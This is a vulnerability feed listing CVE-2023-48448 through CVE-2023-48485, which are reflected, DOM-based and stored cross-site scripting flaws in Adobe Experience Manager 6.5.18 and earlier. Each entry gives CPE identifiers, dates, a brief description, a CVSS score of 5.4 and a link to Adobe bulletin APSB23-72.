Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48448

First published on : 15-12-2023 11:15:11
Last modified on : 18-12-2023 19:30:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48448
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48449

First published on : 15-12-2023 11:15:12
Last modified on : 18-12-2023 19:29:57

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48449
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48450

First published on : 15-12-2023 11:15:12
Last modified on : 18-12-2023 19:29:50

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48450
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48451

First published on : 15-12-2023 11:15:12
Last modified on : 18-12-2023 19:29:41

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48451
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48452

First published on : 15-12-2023 11:15:12
Last modified on : 18-12-2023 19:29:21

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48452
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48453

First published on : 15-12-2023 11:15:12
Last modified on : 18-12-2023 19:29:14

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48453
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48454

First published on : 15-12-2023 11:15:13
Last modified on : 18-12-2023 19:29:05

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48454
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48455

First published on : 15-12-2023 11:15:13
Last modified on : 18-12-2023 19:28:50

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48455
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48456

First published on : 15-12-2023 11:15:13
Last modified on : 18-12-2023 19:28:40

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48456
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48457

First published on : 15-12-2023 11:15:13
Last modified on : 18-12-2023 19:28:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48457
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48458

First published on : 15-12-2023 11:15:13
Last modified on : 18-12-2023 19:28:27

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48458
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48459

First published on : 15-12-2023 11:15:14
Last modified on : 18-12-2023 19:28:16

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48459
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48460

First published on : 15-12-2023 11:15:14
Last modified on : 18-12-2023 19:28:04

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48460
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48461

First published on : 15-12-2023 11:15:14
Last modified on : 18-12-2023 19:20:49

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48461
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48462

First published on : 15-12-2023 11:15:14
Last modified on : 18-12-2023 19:20:42

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48462
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48463

First published on : 15-12-2023 11:15:14
Last modified on : 18-12-2023 19:20:36

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48463
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48464

First published on : 15-12-2023 11:15:15
Last modified on : 18-12-2023 19:20:17

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48464
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48465

First published on : 15-12-2023 11:15:15
Last modified on : 18-12-2023 19:20:11

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48465
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48466

First published on : 15-12-2023 11:15:15
Last modified on : 18-12-2023 19:20:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48466
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48467

First published on : 15-12-2023 11:15:15
Last modified on : 18-12-2023 19:19:56

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48467
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48468

First published on : 15-12-2023 11:15:15
Last modified on : 18-12-2023 20:16:47

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48468
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48469

First published on : 15-12-2023 11:15:16
Last modified on : 18-12-2023 20:16:55

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48469
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48470

First published on : 15-12-2023 11:15:16
Last modified on : 18-12-2023 20:17:04

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48470
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48471

First published on : 15-12-2023 11:15:16
Last modified on : 18-12-2023 20:17:11

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48471
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48472

First published on : 15-12-2023 11:15:16
Last modified on : 18-12-2023 20:17:18

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48472
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48473

First published on : 15-12-2023 11:15:17
Last modified on : 18-12-2023 19:31:56

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48473
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48474

First published on : 15-12-2023 11:15:17
Last modified on : 18-12-2023 19:34:01

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48474
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48475

First published on : 15-12-2023 11:15:17
Last modified on : 18-12-2023 19:33:55

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48475
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48476

First published on : 15-12-2023 11:15:17
Last modified on : 18-12-2023 19:33:47

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48476
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48477

First published on : 15-12-2023 11:15:17
Last modified on : 18-12-2023 19:33:40

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48477
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48478

First published on : 15-12-2023 11:15:18
Last modified on : 18-12-2023 19:33:34

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48478
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48479

First published on : 15-12-2023 11:15:18
Last modified on : 18-12-2023 19:33:27

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48479
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48480

First published on : 15-12-2023 11:15:18
Last modified on : 18-12-2023 19:33:23

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48480
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48481

First published on : 15-12-2023 11:15:18
Last modified on : 18-12-2023 19:33:17

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48481
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48482

First published on : 15-12-2023 11:15:18
Last modified on : 18-12-2023 19:33:06

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48482
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48483

First published on : 15-12-2023 11:15:19
Last modified on : 18-12-2023 19:33:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48483
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48484

First published on : 15-12-2023 11:15:19
Last modified on : 18-12-2023 19:32:53

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48484
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48485

First published on : 15-12-2023 11:15:19
Last modified on : 18-12-2023 19:32:46

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48485
Source : psirt@adobe.com
CVSS Score : 5.4

References :
